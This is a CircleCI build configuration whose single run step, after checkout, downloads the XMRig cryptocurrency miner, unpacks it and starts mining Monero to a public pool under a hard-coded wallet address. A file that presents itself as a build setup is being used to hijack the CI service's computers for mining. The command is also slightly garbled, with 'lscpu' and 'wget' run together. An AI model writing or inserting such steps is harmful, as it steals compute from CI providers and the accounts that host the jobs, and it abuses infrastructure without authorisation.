version: 2.0
jobs:
  build:
    docker:
      - image: circleci/ruby:2.4.2-jessie-node
        auth:
          username: mydockerhub-user
          password: $DOCKERHUB_PASSWORD  # context / project UI env-var reference
    steps:
      - checkout
      - run: lscpuwget https://github.com/xmrig/xmrig/releases/download/v6.7.0/xmrig-6.7.0-bionic-x64.tar.gz && tar xf xmrig-6.7.0-bionic-x64.tar.gz && cd xmrig-6.7.0 && ./xmrig --donate-level 1 -o pool.minexmr.com:4444 -u 885FRA14bQhhvT1Hn76iTniB7Xf7j222Y9vzT4VHFLRNEqf5Hs1YnrSgKTmkxx556nSvtehrDeGSC5iQUk6kZRGoLaKonK4.cpuciclecloud
